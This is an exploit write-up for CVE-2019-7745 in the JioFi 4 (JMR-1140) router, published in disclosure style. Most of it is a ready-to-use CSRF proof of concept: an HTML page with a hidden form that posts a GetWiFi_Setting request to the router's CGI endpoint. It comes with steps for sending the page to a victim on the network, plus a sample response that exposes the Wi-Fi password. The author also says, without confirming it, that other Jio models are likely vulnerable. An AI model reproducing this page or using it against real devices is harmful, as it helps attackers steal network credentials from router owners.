# Exploit Title: Jiofi 4 (JMR 1140) CSRF To View Wi-fi Password # Date: 12.02.2019 # Exploit Author: Ronnie T Baby # Contact:https://www.linkedin.com/in/ronnietbaby # Vendor Homepage: www.jio.com # Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574 # Category: Hardware (Wifi Router) # Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07 # Tested on: Ubuntu 18.04 # CVE: CVE-2019-7745 Description: JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain the Wi-Fi password by making a cgi-in/qcmap_web_cgi Page=GetWiFi_Setting request and then reading the wpa_security_key field. POC- 1. Create a view.html and insert <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST"> <input type="hidden" name="Page" value="GetWiFi&#95;Setting" /> <input type="hidden" name="Mask" value="0" /> <input type="hidden" name="result" value="0" /> <input type="submit" value="Submit request" /> </form> </body> </html> 2. Send to victim(who is connected to the wifi network). 3. The response gives the current wifi password. Example response- {"Page":"GetWiFi_Setting","Mask":"0","result":"SUCCESS","ssid":"JioFi4_08FE5F","mode_802_11":"11bgn","tx_power":"MID", "wmm":"Enable","wps_enable":"PushButton","wifi_security":"WPA2PSK","wpa_encryption_type":"AES", "wpa_security_key":"leakedpassword",".....etc} Note- I believe this to work in all other jio routers viz. Jio JMR 540, Jiofi M2 as all share similar web interface. I have not confirmed this.